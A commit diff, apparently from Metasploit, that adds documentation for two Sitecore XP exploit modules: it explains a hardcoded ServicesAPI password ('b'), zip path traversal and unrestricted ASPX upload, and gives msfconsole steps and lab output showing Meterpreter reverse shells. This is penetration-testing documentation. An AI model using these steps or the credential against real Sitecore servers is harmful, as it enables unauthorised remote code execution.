Adds docs

msutovsky-r7 · msutovsky-r7 · commit a8e97e034c44 · 2025-08-26T13:06:57.000+02:00
diff --git a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_34510.md b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_34510.md
@@ -1,44 +1,53 @@
-The following is the recommended format for module documentation. But feel free to add more content/sections to this.
-One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
-functioning in 5+ years, so giving links or specific examples can be VERY helpful.
-
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+The Sitecore Experience Platform (XP) is flagship CMS product. Provides comprehensive digital marketing tools, view of customer data and many other features. Sitecore deploys multiple default service accounts when installing, among them ServicesAPI. The versions from 10 to 10.4 have hardcoded password for this account - the password is letter b (CVE-2025-34509). This account is used to gain access and exploit additional vulnerability - path traversal in zip extraction (CVE-2025-34510). This module exploits both vulnerabilities to gain remote code execution by uploading malicious ASPX into root directory of webserver.
+
+### Installation
+
+The Sitecore XP can be downloaded from [here](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform). Please note that a license is required for successful installation.
+
 
 ## Verification Steps
-Example steps in this format (is also in the PR):
 
 1. Install the application
 1. Start msfconsole
-1. Do: `use [module path]`
+1. Do: `use exploit/windows/http/sitecore_xp_cve_2025_34510`
+1. Do: `set RHOSTS [Sitecore XP IP address]`
+1. Do: `set VHOST [Sitecore XP hostname]`
+1. Do: `set IDENTITY_VHOST [hostname of Sitecore XP identity server]`
+1. Do: `set LHOST [attacker IP]`
 1. Do: `run`
-1. You should get a shell.
 
 ## Options
-List each option and how to use it.
 
-### Option Name
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+### VHOST
 
-## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
+The hostname of Sitecore XP - when installed, Sitecore XP deploys multiple vhosts, among them is the Sitecore XP host, where a user can access majority of functions. 
 
-### Version and OS
 
-```
-code or console output
-```
+### IDENTITY_VHOST
 
-For example:
+The Sitecore XP uses separate vhost for "identity host", which is used when user is authenticating and asking for session data.
 
-To do this specific thing, here's how you do it:
+## Scenarios
 
 ```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+msf exploit(windows/http/sitecore_xp_cve_2025_34510) > run verbose=true
+[*] Started reverse TCP handler on 192.168.3.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Sitecore version detected 10.3.0, which is vulnerable
+[*] Sending stage (203846 bytes) to 10.5.132.138
+[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.138:50530) at 2025-08-26 13:05:53 +0200
+
+meterpreter > sysinfo
+Computer        : WIN11_22H2_0800
+OS              : Windows 11 22H2 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: IIS APPPOOL\sitecorepocsc.dev.local
 ```
diff --git a/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_34511.md b/documentation/modules/exploit/windows/http/sitecore_xp_cve_2025_34511.md
@@ -1,40 +1,62 @@
 ## Vulnerable Application
 
+The Sitecore Experience Platform (XP) is flagship CMS product. Provides comprehensive digital marketing tools, view of customer data and many other features. A user can install multiple extensions to Sitecore XP - among them is Sitecore PowerShell Extension (SPA). It is obligatory requirement for popular SXA add-on. The SPA is vulnerable to unrestricted file upload up to version 7.0. An attacker can upload malicious ASPX file and gain remote code execution.
+
+
 ### Installation
 
-The Sitecore Experience Platform (XP) is flagship CMS product. Provides comprehensive digital marketing tools, view of customer data and many other features.  
+The Sitecore XP can be downloaded from [here](https://developers.sitecore.com/downloads/Sitecore_Experience_Platform). Please note that a license is required for successful installation.
+
 
 ## Verification Steps
-Example steps in this format (is also in the PR):
 
 1. Install the application
 1. Start msfconsole
-1. Do: `use [module path]`
+1. Do: `use exploit/windows/http/sitecore_xp_cve_2025_34511`
+1. Do: `set RHOSTS [Sitecore XP IP address]`
+1. Do: `set VHOST [Sitecore XP hostname]`
+1. Do: `set IDENTITY_VHOST [hostname of Sitecore XP identity server]`
+1. Do: `set LHOST [attacker IP]`
 1. Do: `run`
-1. You should get a shell.
 
 ## Options
-List each option and how to use it.
 
-### Option Name
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+### VHOST
 
-## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
+The hostname of Sitecore XP - when installed, Sitecore XP deploys multiple vhosts, among them is the Sitecore XP host, where a user can access majority of functions. 
 
-### Version and OS
 
-```
-code or console output
-```
+### IDENTITY_VHOST
+
+The Sitecore XP uses separate vhost for "identity host", which is used when user is authenticating and asking for session data.
 
-For example:
 
-To do this specific thing, here's how you do it:
+## Scenarios
+
 
 ```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set RHOSTS 10.5.132.138
+RHOSTS => 10.5.132.138
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set VHOST sitecorepocsc.dev.local
+VHOST => sitecorepocsc.dev.local
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > set IDENTITY_VHOST sitecorepocidentityserver.dev.local
+IDENTITY_VHOST => sitecorepocidentityserver.dev.local
+msf exploit(windows/http/sitecore_xp_cve_2025_34511) > run verbose=true 
+[*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Sitecore version detected 10.3.0, which is vulnerable
+[*] Sending stage (203846 bytes) to 10.5.132.138
+[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.132.138:50194) at 2025-08-26 12:58:22 +0200
+
+meterpreter > sysinfo
+Computer        : WIN11_22H2_0800
+OS              : Windows 11 22H2 (10.0 Build 22621).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: IIS APPPOOL\sitecorepocsc.dev.local
 ```
